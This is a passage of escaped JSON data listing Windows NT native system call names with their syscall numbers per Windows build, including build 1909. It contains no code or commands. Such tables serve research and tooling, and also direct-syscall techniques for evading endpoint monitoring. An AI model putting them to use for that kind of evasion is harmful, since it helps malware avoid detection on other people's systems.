\"NtReplyWaitReceivePortEx\": \"43\", \"NtTerminateProcess\": \"44\", \"NtSetEventBoostPriority\": \"45\", \"NtReadFileScatter\": \"46\", \"NtOpenThreadTokenEx\": \"47\", \"NtOpenProcessTokenEx\": \"48\", \"NtQueryPerformanceCounter\": \"49\", \"NtEnumerateKey\": \"50\", \"NtOpenFile\": \"51\", \"NtDelayExecution\": \"52\", \"NtQueryDirectoryFile\": \"53\", \"NtQuerySystemInformation\": \"54\", \"NtOpenSection\": \"55\", \"NtQueryTimer\": \"56\", \"NtFsControlFile\": \"57\", \"NtWriteVirtualMemory\": \"58\", \"NtCloseObjectAuditAlarm\": \"59\", \"NtDuplicateObject\": \"60\", \"NtQueryAttributesFile\": \"61\", \"NtClearEvent\": \"62\", \"NtReadVirtualMemory\": \"63\", \"NtOpenEvent\": \"64\", \"NtAdjustPrivilegesToken\": \"65\", \"NtDuplicateToken\": \"66\", \"NtContinue\": \"67\", \"NtQueryDefaultUILanguage\": \"68\", \"NtQueueApcThread\": \"69\", \"NtYieldExecution\": \"70\", \"NtAddAtom\": \"71\", \"NtCreateEvent\": \"72\", \"NtQueryVolumeInformationFile\": \"73\", \"NtCreateSection\": \"74\", \"NtFlushBuffersFile\": \"75\", \"NtApphelpCacheControl\": \"76\", \"NtCreateProcessEx\": \"77\", \"NtCreateThread\": \"78\", \"NtIsProcessInJob\": \"79\", \"NtProtectVirtualMemory\": \"80\", \"NtQuerySection\": \"81\", \"NtResumeThread\": \"82\", \"NtTerminateThread\": \"83\", \"NtReadRequestData\": \"84\", \"NtCreateFile\": \"85\", \"NtQueryEvent\": \"86\", \"NtWriteRequestData\": \"87\", \"NtOpenDirectoryObject\": \"88\", \"NtAccessCheckByTypeAndAuditAlarm\": \"89\", \"NtQuerySystemTime\": \"90\", \"NtWaitForMultipleObjects\": \"91\", \"NtSetInformationObject\": \"92\", \"NtCancelIoFile\": \"93\", \"NtTraceEvent\": \"94\", \"NtPowerInformation\": \"95\", \"NtSetValueKey\": \"96\", \"NtCancelTimer\": \"97\", \"NtSetTimer\": \"98\", \"NtAccessCheckByType\": \"99\", \"NtAccessCheckByTypeResultList\": \"100\", \"NtAccessCheckByTypeResultListAndAuditAlarm\": \"101\", \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\": \"102\", \"NtAcquireProcessActivityReference\": \"103\", \"NtAddAtomEx\": \"104\", \"NtAddBootEntry\": \"105\", \"NtAddDriverEntry\": \"106\", \"NtAdjustGroupsToken\": \"107\", \"NtAdjustTokenClaimsAndDeviceGroups\": \"108\", \"NtAlertResumeThread\": \"109\", \"NtAlertThread\": \"110\", \"NtAlertThreadByThreadId\": \"111\", \"NtAllocateLocallyUniqueId\": \"112\", \"NtAllocateReserveObject\": \"113\", \"NtAllocateUserPhysicalPages\": \"114\", \"NtAllocateUuids\": \"115\", \"NtAllocateVirtualMemoryEx\": \"116\", \"NtAlpcAcceptConnectPort\": \"117\", \"NtAlpcCancelMessage\": \"118\", \"NtAlpcConnectPort\": \"119\", \"NtAlpcConnectPortEx\": \"120\", \"NtAlpcCreatePort\": \"121\", \"NtAlpcCreatePortSection\": \"122\", \"NtAlpcCreateResourceReserve\": \"123\", \"NtAlpcCreateSectionView\": \"124\", \"NtAlpcCreateSecurityContext\": \"125\", \"NtAlpcDeletePortSection\": \"126\", \"NtAlpcDeleteResourceReserve\": \"127\", \"NtAlpcDeleteSectionView\": \"128\", \"NtAlpcDeleteSecurityContext\": \"129\", \"NtAlpcDisconnectPort\": \"130\", \"NtAlpcImpersonateClientContainerOfPort\": \"131\", \"NtAlpcImpersonateClientOfPort\": \"132\", \"NtAlpcOpenSenderProcess\": \"133\", \"NtAlpcOpenSenderThread\": \"134\", \"NtAlpcQueryInformation\": \"135\", \"NtAlpcQueryInformationMessage\": \"136\", \"NtAlpcRevokeSecurityContext\": \"137\", \"NtAlpcSendWaitReceivePort\": \"138\", \"NtAlpcSetInformation\": \"139\", \"NtAreMappedFilesTheSame\": \"140\", \"NtAssignProcessToJobObject\": \"141\", \"NtAssociateWaitCompletionPacket\": \"142\", \"NtCallEnclave\": \"143\", \"NtCancelIoFileEx\": \"144\", \"NtCancelSynchronousIoFile\": \"145\", \"NtCancelTimer2\": \"146\", \"NtCancelWaitCompletionPacket\": \"147\", \"NtCommitComplete\": \"148\", \"NtCommitEnlistment\": \"149\", \"NtCommitRegistryTransaction\": \"150\", \"NtCommitTransaction\": \"151\", \"NtCompactKeys\": \"152\", \"NtCompareObjects\": \"153\", \"NtCompareSigningLevels\": \"154\", \"NtCompareTokens\": \"155\", \"NtCompleteConnectPort\": \"156\", \"NtCompressKey\": \"157\", \"NtConnectPort\": \"158\", \"NtConvertBetweenAuxiliaryCounterAndPerformanceCounter\": \"159\", \"NtCreateCrossVmEvent\": \"160\", \"NtCreateDebugObject\": \"161\", \"NtCreateDirectoryObject\": \"162\", \"NtCreateDirectoryObjectEx\": \"163\", \"NtCreateEnclave\": \"164\", \"NtCreateEnlistment\": \"165\", \"NtCreateEventPair\": \"166\", \"NtCreateIRTimer\": \"167\", \"NtCreateIoCompletion\": \"168\", \"NtCreateJobObject\": \"169\", \"NtCreateJobSet\": \"170\", \"NtCreateKeyTransacted\": \"171\", \"NtCreateKeyedEvent\": \"172\", \"NtCreateLowBoxToken\": \"173\", \"NtCreateMailslotFile\": \"174\", \"NtCreateMutant\": \"175\", \"NtCreateNamedPipeFile\": \"176\", \"NtCreatePagingFile\": \"177\", \"NtCreatePartition\": \"178\", \"NtCreatePort\": \"179\", \"NtCreatePrivateNamespace\": \"180\", \"NtCreateProcess\": \"181\", \"NtCreateProfile\": \"182\", \"NtCreateProfileEx\": \"183\", \"NtCreateRegistryTransaction\": \"184\", \"NtCreateResourceManager\": \"185\", \"NtCreateSectionEx\": \"186\", \"NtCreateSemaphore\": \"187\", \"NtCreateSymbolicLinkObject\": \"188\", \"NtCreateThreadEx\": \"189\", \"NtCreateTimer\": \"190\", \"NtCreateTimer2\": \"191\", \"NtCreateToken\": \"192\", \"NtCreateTokenEx\": \"193\", \"NtCreateTransaction\": \"194\", \"NtCreateTransactionManager\": \"195\", \"NtCreateUserProcess\": \"196\", \"NtCreateWaitCompletionPacket\": \"197\", \"NtCreateWaitablePort\": \"198\", \"NtCreateWnfStateName\": \"199\", \"NtCreateWorkerFactory\": \"200\", \"NtDebugActiveProcess\": \"201\", \"NtDebugContinue\": \"202\", \"NtDeleteAtom\": \"203\", \"NtDeleteBootEntry\": \"204\", \"NtDeleteDriverEntry\": \"205\", \"NtDeleteFile\": \"206\", \"NtDeleteKey\": \"207\", \"NtDeleteObjectAuditAlarm\": \"208\", \"NtDeletePrivateNamespace\": \"209\", \"NtDeleteValueKey\": \"210\", \"NtDeleteWnfStateData\": \"211\", \"NtDeleteWnfStateName\": \"212\", \"NtDisableLastKnownGood\": \"213\", \"NtDisplayString\": \"214\", \"NtDrawText\": \"215\", \"NtEnableLastKnownGood\": \"216\", \"NtEnumerateBootEntries\": \"217\", \"NtEnumerateDriverEntries\": \"218\", \"NtEnumerateSystemEnvironmentValuesEx\": \"219\", \"NtEnumerateTransactionObject\": \"220\", \"NtExtendSection\": \"221\", \"NtFilterBootOption\": \"222\", \"NtFilterToken\": \"223\", \"NtFilterTokenEx\": \"224\", \"NtFlushBuffersFileEx\": \"225\", \"NtFlushInstallUILanguage\": \"226\", \"NtFlushInstructionCache\": \"227\", \"NtFlushKey\": \"228\", \"NtFlushProcessWriteBuffers\": \"229\", \"NtFlushVirtualMemory\": \"230\", \"NtFlushWriteBuffer\": \"231\", \"NtFreeUserPhysicalPages\": \"232\", \"NtFreezeRegistry\": \"233\", \"NtFreezeTransactions\": \"234\", \"NtGetCachedSigningLevel\": \"235\", \"NtGetCompleteWnfStateSubscription\": \"236\", \"NtGetContextThread\": \"237\", \"NtGetCurrentProcessorNumber\": \"238\", \"NtGetCurrentProcessorNumberEx\": \"239\", \"NtGetDevicePowerState\": \"240\", \"NtGetMUIRegistryInfo\": \"241\", \"NtGetNextProcess\": \"242\", \"NtGetNextThread\": \"243\", \"NtGetNlsSectionPtr\": \"244\", \"NtGetNotificationResourceManager\": \"245\", \"NtGetWriteWatch\": \"246\", \"NtImpersonateAnonymousToken\": \"247\", \"NtImpersonateThread\": \"248\", \"NtInitializeEnclave\": \"249\", \"NtInitializeNlsFiles\": \"250\", \"NtInitializeRegistry\": \"251\", \"NtInitiatePowerAction\": \"252\", \"NtIsSystemResumeAutomatic\": \"253\", \"NtIsUILanguageComitted\": \"254\", \"NtListenPort\": \"255\", \"NtLoadDriver\": \"256\", \"NtLoadEnclaveData\": \"257\", \"NtLoadKey\": \"258\", \"NtLoadKey2\": \"259\", \"NtLoadKeyEx\": \"260\", \"NtLockFile\": \"261\", \"NtLockProductActivationKeys\": \"262\", \"NtLockRegistryKey\": \"263\", \"NtLockVirtualMemory\": \"264\", \"NtMakePermanentObject\": \"265\", \"NtMakeTemporaryObject\": \"266\", \"NtManageHotPatch\": \"267\", \"NtManagePartition\": \"268\", \"NtMapCMFModule\": \"269\", \"NtMapUserPhysicalPages\": \"270\", \"NtMapViewOfSectionEx\": \"271\", \"NtModifyBootEntry\": \"272\", \"NtModifyDriverEntry\": \"273\", \"NtNotifyChangeDirectoryFile\": \"274\", \"NtNotifyChangeDirectoryFileEx\": \"275\", \"NtNotifyChangeKey\": \"276\", \"NtNotifyChangeMultipleKeys\": \"277\", \"NtNotifyChangeSession\": \"278\", \"NtOpenEnlistment\": \"279\", \"NtOpenEventPair\": \"280\", \"NtOpenIoCompletion\": \"281\", \"NtOpenJobObject\": \"282\", \"NtOpenKeyEx\": \"283\", \"NtOpenKeyTransacted\": \"284\", \"NtOpenKeyTransactedEx\": \"285\", \"NtOpenKeyedEvent\": \"286\", \"NtOpenMutant\": \"287\", \"NtOpenObjectAuditAlarm\": \"288\", \"NtOpenPartition\": \"289\", \"NtOpenPrivateNamespace\": \"290\", \"NtOpenProcessToken\": \"291\", \"NtOpenRegistryTransaction\": \"292\", \"NtOpenResourceManager\": \"293\", \"NtOpenSemaphore\": \"294\", \"NtOpenSession\": \"295\", \"NtOpenSymbolicLinkObject\": \"296\", \"NtOpenThread\": \"297\", \"NtOpenTimer\": \"298\", \"NtOpenTransaction\": \"299\", \"NtOpenTransactionManager\": \"300\", \"NtPlugPlayControl\": \"301\", \"NtPrePrepareComplete\": \"302\", \"NtPrePrepareEnlistment\": \"303\", \"NtPrepareComplete\": \"304\", \"NtPrepareEnlistment\": \"305\", \"NtPrivilegeCheck\": \"306\", \"NtPrivilegeObjectAuditAlarm\": \"307\", \"NtPrivilegedServiceAuditAlarm\": \"308\", \"NtPropagationComplete\": \"309\", \"NtPropagationFailed\": \"310\", \"NtPulseEvent\": \"311\", \"NtQueryAuxiliaryCounterFrequency\": \"312\", \"NtQueryBootEntryOrder\": \"313\", \"NtQueryBootOptions\": \"314\", \"NtQueryDebugFilterState\": \"315\", \"NtQueryDirectoryFileEx\": \"316\", \"NtQueryDirectoryObject\": \"317\", \"NtQueryDriverEntryOrder\": \"318\", \"NtQueryEaFile\": \"319\", \"NtQueryFullAttributesFile\": \"320\", \"NtQueryInformationAtom\": \"321\", \"NtQueryInformationByName\": \"322\", \"NtQueryInformationEnlistment\": \"323\", \"NtQueryInformationJobObject\": \"324\", \"NtQueryInformationPort\": \"325\", \"NtQueryInformationResourceManager\": \"326\", \"NtQueryInformationTransaction\": \"327\", \"NtQueryInformationTransactionManager\": \"328\", \"NtQueryInformationWorkerFactory\": \"329\", \"NtQueryInstallUILanguage\": \"330\", \"NtQueryIntervalProfile\": \"331\", \"NtQueryIoCompletion\": \"332\", \"NtQueryLicenseValue\": \"333\", \"NtQueryMultipleValueKey\": \"334\", \"NtQueryMutant\": \"335\", \"NtQueryOpenSubKeys\": \"336\", \"NtQueryOpenSubKeysEx\": \"337\", \"NtQueryPortInformationProcess\": \"338\", \"NtQueryQuotaInformationFile\": \"339\", \"NtQuerySecurityAttributesToken\": \"340\", \"NtQuerySecurityObject\": \"341\", \"NtQuerySecurityPolicy\": \"342\", \"NtQuerySemaphore\": \"343\", \"NtQuerySymbolicLinkObject\": \"344\", \"NtQuerySystemEnvironmentValue\": \"345\", \"NtQuerySystemEnvironmentValueEx\": \"346\", \"NtQuerySystemInformationEx\": \"347\", \"NtQueryTimerResolution\": \"348\", \"NtQueryWnfStateData\": \"349\", \"NtQueryWnfStateNameInformation\": \"350\", \"NtQueueApcThreadEx\": \"351\", \"NtRaiseException\": \"352\", \"NtRaiseHardError\": \"353\", \"NtReadOnlyEnlistment\": \"354\", \"NtRecoverEnlistment\": \"355\", \"NtRecoverResourceManager\": \"356\", \"NtRecoverTransactionManager\": \"357\", \"NtRegisterProtocolAddressInformation\": \"358\", \"NtRegisterThreadTerminatePort\": \"359\", \"NtReleaseKeyedEvent\": \"360\", \"NtReleaseWorkerFactoryWorker\": \"361\", \"NtRemoveIoCompletionEx\": \"362\", \"NtRemoveProcessDebug\": \"363\", \"NtRenameKey\": \"364\", \"NtRenameTransactionManager\": \"365\", \"NtReplaceKey\": \"366\", \"NtReplacePartitionUnit\": \"367\", \"NtReplyWaitReplyPort\": \"368\", \"NtRequestPort\": \"369\", \"NtResetEvent\": \"370\", \"NtResetWriteWatch\": \"371\", \"NtRestoreKey\": \"372\", \"NtResumeProcess\": \"373\", \"NtRevertContainerImpersonation\": \"374\", \"NtRollbackComplete\": \"375\", \"NtRollbackEnlistment\": \"376\", \"NtRollbackRegistryTransaction\": \"377\", \"NtRollbackTransaction\": \"378\", \"NtRollforwardTransactionManager\": \"379\", \"NtSaveKey\": \"380\", \"NtSaveKeyEx\": \"381\", \"NtSaveMergedKeys\": \"382\", \"NtSecureConnectPort\": \"383\", \"NtSerializeBoot\": \"384\", \"NtSetBootEntryOrder\": \"385\", \"NtSetBootOptions\": \"386\", \"NtSetCachedSigningLevel\": \"387\", \"NtSetCachedSigningLevel2\": \"388\", \"NtSetContextThread\": \"389\", \"NtSetDebugFilterState\": \"390\", \"NtSetDefaultHardErrorPort\": \"391\", \"NtSetDefaultLocale\": \"392\", \"NtSetDefaultUILanguage\": \"393\", \"NtSetDriverEntryOrder\": \"394\", \"NtSetEaFile\": \"395\", \"NtSetHighEventPair\": \"396\", \"NtSetHighWaitLowEventPair\": \"397\", \"NtSetIRTimer\": \"398\", \"NtSetInformationDebugObject\": \"399\", \"NtSetInformationEnlistment\": \"400\", \"NtSetInformationJobObject\": \"401\", \"NtSetInformationKey\": \"402\", \"NtSetInformationResourceManager\": \"403\", \"NtSetInformationSymbolicLink\": \"404\", \"NtSetInformationToken\": \"405\", \"NtSetInformationTransaction\": \"406\", \"NtSetInformationTransactionManager\": \"407\", \"NtSetInformationVirtualMemory\": \"408\", \"NtSetInformationWorkerFactory\": \"409\", \"NtSetIntervalProfile\": \"410\", \"NtSetIoCompletion\": \"411\", \"NtSetIoCompletionEx\": \"412\", \"NtSetLdtEntries\": \"413\", \"NtSetLowEventPair\": \"414\", \"NtSetLowWaitHighEventPair\": \"415\", \"NtSetQuotaInformationFile\": \"416\", \"NtSetSecurityObject\": \"417\", \"NtSetSystemEnvironmentValue\": \"418\", \"NtSetSystemEnvironmentValueEx\": \"419\", \"NtSetSystemInformation\": \"420\", \"NtSetSystemPowerState\": \"421\", \"NtSetSystemTime\": \"422\", \"NtSetThreadExecutionState\": \"423\", \"NtSetTimer2\": \"424\", \"NtSetTimerEx\": \"425\", \"NtSetTimerResolution\": \"426\", \"NtSetUuidSeed\": \"427\", \"NtSetVolumeInformationFile\": \"428\", \"NtSetWnfProcessNotificationEvent\": \"429\", \"NtShutdownSystem\": \"430\", \"NtShutdownWorkerFactory\": \"431\", \"NtSignalAndWaitForSingleObject\": \"432\", \"NtSinglePhaseReject\": \"433\", \"NtStartProfile\": \"434\", \"NtStopProfile\": \"435\", \"NtSubscribeWnfStateChange\": \"436\", \"NtSuspendProcess\": \"437\", \"NtSuspendThread\": \"438\", \"NtSystemDebugControl\": \"439\", \"NtTerminateEnclave\": \"440\", \"NtTerminateJobObject\": \"441\", \"NtTestAlert\": \"442\", \"NtThawRegistry\": \"443\", \"NtThawTransactions\": \"444\", \"NtTraceControl\": \"445\", \"NtTranslateFilePath\": \"446\", \"NtUmsThreadYield\": \"447\", \"NtUnloadDriver\": \"448\", \"NtUnloadKey\": \"449\", \"NtUnloadKey2\": \"450\", \"NtUnloadKeyEx\": \"451\", \"NtUnlockFile\": \"452\", \"NtUnlockVirtualMemory\": \"453\", \"NtUnmapViewOfSectionEx\": \"454\", \"NtUnsubscribeWnfStateChange\": \"455\", \"NtUpdateWnfStateData\": \"456\", \"NtVdmControl\": \"457\", \"NtWaitForAlertByThreadId\": \"458\", \"NtWaitForDebugEvent\": \"459\", \"NtWaitForKeyedEvent\": \"460\", \"NtWaitForWorkViaWorkerFactory\": \"461\", \"NtWaitHighEventPair\": \"462\", \"NtWaitLowEventPair\": \"463\"}, \"1909\": {\"NtAccessCheck\": \"0\", \"NtWorkerFactoryWorkerReady\": \"1\", \"NtAcceptConnectPort\": \"2\", \"NtMapUserPhysicalPagesScatter\": \"3\", \"NtWaitForSingleObject\": \"4\", \"NtCallbackReturn\": \"5\", \"NtReadFile\": \"6\", \"NtDeviceIoControlFile\": \"7\", \"NtWriteFile\": \"8\", \"NtRemoveIoCompletion\": \"9\", \"NtReleaseSemaphore\": \"10\", \"NtReplyWaitReceivePort\": \"11\", \"NtReplyPort\": \"12\", \"NtSetInformationThread\": \"13\", \"NtSetEvent\": \"14\", \"NtClose\": \"15\", \"NtQueryObject\": \"16\", \"NtQueryInformationFile\": \"17\", \"NtOpenKey\": \"18\", \"NtEnumerateValueKey\": \"19\", \"NtFindAtom\": \"20\", \"NtQueryDefaultLocale\": \"21\", \"NtQueryKey\": \"22\", \"NtQueryValueKey\": \"23\", \"NtAllocateVirtualMemory\": \"24\", \"NtQueryInformationProcess\": \"25\", \"NtWaitForMultipleObjects32\": \"26\", \"NtWriteFileGather\": \"27\", \"NtSetInformationProcess\": \"28\", \"NtCreateKey\": \"29\", \"NtFreeVirtualMemory\": \"30\", \"NtImpersonateClientOfPort\": \"31\", \"NtReleaseMutant\": \"32\", \"NtQueryInformationToken\": \"33\", \"NtRequestWaitReplyPort\": \"34\", \"NtQueryVirtualMemory\": \"35\", \"NtOpenThreadToken\": \"36\", \"NtQueryInformationThread\": \"37\", \"NtOpenProcess\": \"38\", \"NtSetInformationFile\": \"39\", \"NtMapViewOfSection\": \"40\", \"NtAccessCheckAndAuditAlarm\": \"41\", \"NtUnmapViewOfSection\": \"42\", \"NtReplyWaitReceivePortEx\": \"43\", \"NtTerminateProcess\": \"44\", \"NtSetEventBoostPriority\": \"45\", \"NtReadFileScatter\": \"46\", \"NtOpenThreadTokenEx\": \"47\", \"NtOpenProcessTokenEx\": \"48\", \"NtQueryPerformanceCounter\": \"49\", \"NtEnumerateKey\": \"50\", \"NtOpenFile\": \"51\", \"NtDelayExecution\": \"52\", \"NtQueryDirectoryFile\": \"53\", \"NtQuerySystemInformation\": \"54\", \"NtOpenSection\": \"55\", \"NtQueryTimer\": \"56\", \"NtFsControlFile\": \"57\", \"NtWriteVirtualMemory\": \"58\", \"NtCloseObjectAuditAlarm\": \"59\", \"NtDuplicateObject\": \"60\", \"NtQueryAttributesFile\": \"61\", \"NtClearEvent\": \"62\", \"NtReadVirtualMemory\": \"63\", \"NtOpenEvent\": \"64\", \"NtAdjustPrivilegesToken\": \"65\", \"NtDuplicateToken\": \"66\", \"NtContinue\": \"67\", \"NtQueryDefaultUILanguage\": \"68\", \"NtQueueApcThread\": \"69\", \"NtYieldExecution\": \"70\", \"NtAddAtom\": \"71\", \"NtCreateEvent\": \"72\", \"NtQueryVolumeInformationFile\": \"73\", \"NtCreateSection\": \"74\", \"NtFlushBuffersFile\": \"75\", \"NtApphelpCacheControl\": \"76\", \"NtCreateProcessEx\": \"77\", \"NtCreateThread\": \"78\", \"NtIsProcessInJob\": \"79\", \"NtProtectVirtualMemory\": \"80\", \"NtQuerySection\": \"81\", \"NtResumeThread\": \"82\", \"NtTerminateThread\": \"83\", \"NtReadRequestData\": \"84\", \"NtCreateFile\": \"85\", \"NtQueryEvent\": \"86\", \"NtWriteRequestData\": \"87\", \"NtOpenDirectoryObject\": \"88\", \"NtAccessCheckByTypeAndAuditAlarm\": \"89\", \"NtQuerySystemTime\": \"90\", \"NtWaitForMultipleObjects\": \"91\", \"NtSetInformationObject\": \"92\", \"NtCancelIoFile\": \"93\", \"NtTraceEvent\": \"94\", \"NtPowerInformation\": \"95\", \"NtSetValueKey\": \"96\", \"NtCancelTimer\": \"97\", \"NtSetTimer\": \"98\", \"NtAccessCheckByType\": \"99\", \"NtAccessCheckByTypeResultList\": \"100\", \"NtAccessCheckByTypeResultListAndAuditAlarm\": \"101\", \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\": \"102\", \"NtAcquireProcessActivityReference\": \"103\", \"NtAddAtomEx\": \"104\", \"NtAddBootEntry\": \"105\", \"NtAddDriverEntry\": \"106\", \"NtAdjustGroupsToken\": \"107\", \"NtAdjustTokenClaimsAndDeviceGroups\": \"108\", \"NtAlertResumeThread\": \"109\", \"NtAlertThread\": \"110\", \"NtAlertThreadByThreadId\": \"111\", \"NtAllocateLocallyUniqueId\": \"112\", \"NtAllocateReserveObject\": \"113\", \"NtAllocateUserPhysicalPages\": \"114\", \"NtAllocateUuids\": \"115\", \"NtAllocateVirtualMemoryEx\": \"116\", \"NtAlpcAcceptConnectPort\": \"117\", \"NtAlpcCancelMessage\": \"118\", \"NtAlpcConnectPort\": \"119\", \"NtAlpcConnectPortEx\": \"120\", \"NtAlpcCreatePort\": \"121\", \"NtAlpcCreatePortSection\": \"122\", \"NtAlpcCreateResourceReserve\": \"123\", \"NtAlpcCreateSectionView\": \"124\", \"NtAlpcCreateSecurityContext\": \"125\", \"NtAlpcDeletePortSection\": \"126\", \"NtAlpcDeleteResourceReserve\": \"127\", \"NtAlpcDeleteSectionView\": \"128\", \"NtAlpcDeleteSecurityContext\": \"129\", \"NtAlpcDisconnectPort\": \"130\", \"NtAlpcImpersonateClientContainerOfPort\": \"131\", \"NtAlpcImpersonateClientOfPort\": \"132\", \"NtAlpcOpenSenderProcess\": \"133\", \"NtAlpcOpenSenderThread\": \"134\", \"NtAlpcQueryInformation\": \"135\", \"NtAlpcQueryInformationMessage\": \"136\", \"NtAlpcRevokeSecurityContext\": \"137\", \"NtAlpcSendWaitReceivePort\": \"138\", \"NtAlpcSetInformation\": \"139\", \"NtAreMappedFilesTheSame\": \"140\", \"NtAssignProcessToJobObject\": \"141\", \"NtAssociateWaitCompletionPacket\": \"142\", \"NtCallEnclave\": \"143\", \"NtCancelIoFileEx\": \"144\", \"NtCancelSynchronousIoFile\": \"145\", \"NtCancelTimer2\": \"146\", \"NtCancelWaitCompletionPacket\": \"147\", \"NtCommitComplete\": \"148\", \"NtCommitEnlistment\": \"149\", \"NtCommitRegistryTransaction\": \"150\", \"NtCommitTransaction\": \"151\", \"NtCompactKeys\": \"152\", \"NtCompareObjects\": \"153\", \"NtCompareSigningLevels\": \"154\", \"NtCompareTokens\": \"155\", \"NtCompleteConnectPort\": \"156\", \"NtCompressKey\": \"157\", \"NtConnectPort\": \"158\", \"NtConvertBetweenAuxiliaryCounterAndPerformanceCounter\": \"159\", \"NtCreateCrossVmEvent\": \"160\", \"NtCreateDebugObject\": \"161\", \"NtCreateDirectoryObject\": \"162\", \"NtCreateDirectoryObjectEx\": \"163\", \"NtCreateEnclave\": \"164\", \"NtCreateEnlistment\": \"165\", \"NtCreateEventPair\": \"166\", \"NtCreateIRTimer\": \"167\", \"NtCreateIoCompletion\": \"168\", \"NtCreateJobObject\": \"169\", \"NtCreateJobSet\": \"170\", \"NtCreateKeyTransacted\": \"171\", \"NtCreateKeyedEvent\": \"172\", \"NtCreateLowBoxToken\": \"173\", \"NtCreateMailslotFile\": \"174\", \"NtCreateMutant\": \"175\", \"NtCreateNamedPipeFile\": \"176\", \"NtCreatePagingFile\": \"177\", \"NtCreatePartition\": \"178\", \"NtCreatePort\": \"179\", \"NtCreatePrivateNamespace\": \"180\", \"NtCreateProcess\": \"181\", \"NtCreateProfile\": \"182\", \"NtCreateProfileEx\": \"183\", \"NtCreateRegistryTransaction\": \"184\", \"NtCreateResourceManager\": \"185\", \"NtCreateSectionEx\": \"186\", \"NtCreateSemaphore\": \"187\", \"NtCreateSymbolicLinkObject\": \"188\", \"NtCreateThreadEx\": \"189\", \"NtCreateTimer\": \"190\", \"NtCreateTimer2\": \"191\", \"NtCreateToken\": \"192\", \"NtCreateTokenEx\": \"193\", \"NtCreateTransaction\": \"194\", \"NtCreateTransactionManager\": \"195\", \"NtCreateUserProcess\": \"196\", \"NtCreateWaitCompletionPacket\": \"197\", \"NtCreateWaitablePort\": \"198\", \"NtCreateWnfStateName\": \"199\", \"NtCreateWorkerFactory\": \"200\", \"NtDebugActiveProcess\": \"201\", \"NtDebugContinue\": \"202\", \"NtDeleteAtom\": \"203\", \"NtDeleteBootEntry\": \"204\", \"NtDeleteDriverEntry\": \"205\", \"NtDeleteFile\": \"206\", \"NtDeleteKey\": \"207\", \"NtDeleteObjectAuditAlarm\": \"208\", \"NtDeletePrivateNamespace\": \"209\", \"NtDeleteValueKey\": \"210\", \"NtDeleteWnfStateData\": \"211\", \"NtDeleteWnfStateName\": \"212\", \"NtDisableLastKnownGood\": \"213\", \"NtDisplayString\": \"214\", \"NtDrawText\": \"215\", \"NtEnableLastKnownGood\": \"216\", \"NtEnumerateBootEntries\": \"217\", \"NtEnumerateDriverEntries\": \"218\", \"NtEnumerateSystemEnvironmentValuesEx\": \"219\", \"NtEnumerateTransactionObject\": \"220\", \"NtExtendSection\": \"221\", \"NtFilterBootOption\": \"222\", \"NtFilterToken\": \"223\", \"NtFilterTokenEx\": \"224\", \"NtFlushBuffersFileEx\": \"225\", \"NtFlushInstallUILanguage\": \"226\", \"NtFlushInstructionCache\": \"227\", \"NtFlushKey\": \"228\", \"NtFlushProcessWriteBuffers\": \"229\", \"NtFlushVirtualMemory\": \"230\", \"NtFlushWriteBuffer\": \"231\", \"NtFreeUserPhysicalPages\": \"232\", \"NtFreezeRegistry\": \"233\", \"NtFreezeTransactions\": \"234\", \"NtGetCachedSigningLevel\": \"235\", \"NtGetCompleteWnfStateSubscription\": \"236\", \"NtGetContextThread\": \"237\", \"NtGetCurrentProcessorNumber\": \"238\", \"NtGetCurrentProcessorNumberEx\": \"239\", \"NtGetDevicePowerState\": \"240\", \"NtGetMUIRegistryInfo\": \"241\", \"NtGetNextProcess\": \"242\", \"NtGetNextThread\": \"243\", \"NtGetNlsSectionPtr\": \"244\", \"NtGetNotificationResourceManager\": \"245\", \"NtGetWriteWatch\": \"246\", \"NtImpersonateAnonymousToken\": \"247\", \"NtImpersonateThread\": \"248\", \"NtInitializeEnclave\": \"249\", \"NtInitializeNlsFiles\": \"250\", \"NtInitializeRegistry\": \"251\", \"NtInitiatePowerAction\": \"252\", \"NtIsSystemResumeAutomatic\": \"253\", \"NtIsUILanguageComitted\": \"254\", \"NtListenPort\": \"255\", \"NtLoadDriver\": \"256\", \"NtLoadEnclaveData\": \"257\", \"NtLoadKey\": \"258\", \"NtLoadKey2\": \"259\", \"NtLoadKeyEx\": \"260\", \"NtLockFile\": \"261\", \"NtLockProductActivationKeys\": \"262\", \"NtLockRegistryKey\": \"263\", \"NtLockVirtualMemory\": \"264\", \"NtMakePermanentObject\": \"265\", \"NtMakeTemporaryObject\": \"266\", \"NtManageHotPatch\": \"267\", \"NtManagePartition\": \"268\", \"NtMapCMFModule\": \"269\", \"NtMapUserPhysicalPages\": \"270\", \"NtMapViewOfSectionEx\": \"271\", \"NtModifyBootEntry\": \"272\", \"NtModifyDriverEntry\": \"273\", \"NtNotifyChangeDirectoryFile\": \"274\", \"NtNotifyChangeDirectoryFileEx\": \"275\", \"NtNotifyChangeKey\": \"276\", \"NtNotifyChangeMultipleKeys\": \"277\", \"NtNotifyChangeSession\": \"278\", \"NtOpenEnlistment\": \"279\", \"NtOpenEventPair\": \"280\", \"NtOpenIoCompletion\": \"281\", \"NtOpenJobObject\": \"282\", \"NtOpenKeyEx\": \"283\", \"NtOpenKeyTransacted\": \"284\", \"NtOpenKeyTransactedEx\": \"285\", \"NtOpenKeyedEvent\": \"286\", \"NtOpenMutant\": \"287\", \"NtOpenObjectAuditAlarm\": \"288\", \"NtOpenPartition\": \"289\", \"NtOpenPrivateNamespace\": \"290\", \"NtOpenProcessToken\": \"291\", \"NtOpenRegistryTransaction\": \"292\", \"NtOpenResourceManager\": \"293\", \"NtOpenSemaphore\": \"294\", \"NtOpenSession\": \"295\", \"NtOpenSymbolicLinkObject\": \"296\", \"NtOpenThread\": \"297\", \"NtOpenTimer\": \"298\", \"NtOpenTransaction\": \"299\", \"NtOpenTransactionManager\": \"300\", \"NtPlugPlayControl\": \"301\", \"NtPrePrepareComplete\": \"302\", \"NtPrePrepareEnlistment\": \"303\", \"NtPrepareComplete\": \"304\", \"NtPrepareEnlistment\": \"305\", \"NtPrivilegeCheck\": \"306\", \"NtPrivilegeObjectAuditAlarm\": \"307\", \"NtPrivilegedServiceAuditAlarm\": \"308\", \"NtPropagationComplete\": \"309\", \"NtPropagationFailed\": \"310\", \"NtPulseEvent\": \"311\", \"NtQueryAuxiliaryCounterFrequency\": \"312\", \"NtQueryBootEntryOrder\": \"313\", \"NtQueryBootOptions\": \"314\", \"NtQueryDebugFilterState\": \"315\", \"NtQueryDirectoryFileEx\": \"316\", \"NtQueryDirectoryObject\": \"317\", \"NtQueryDriverEntryOrder\": \"318\", \"NtQueryEaFile\": 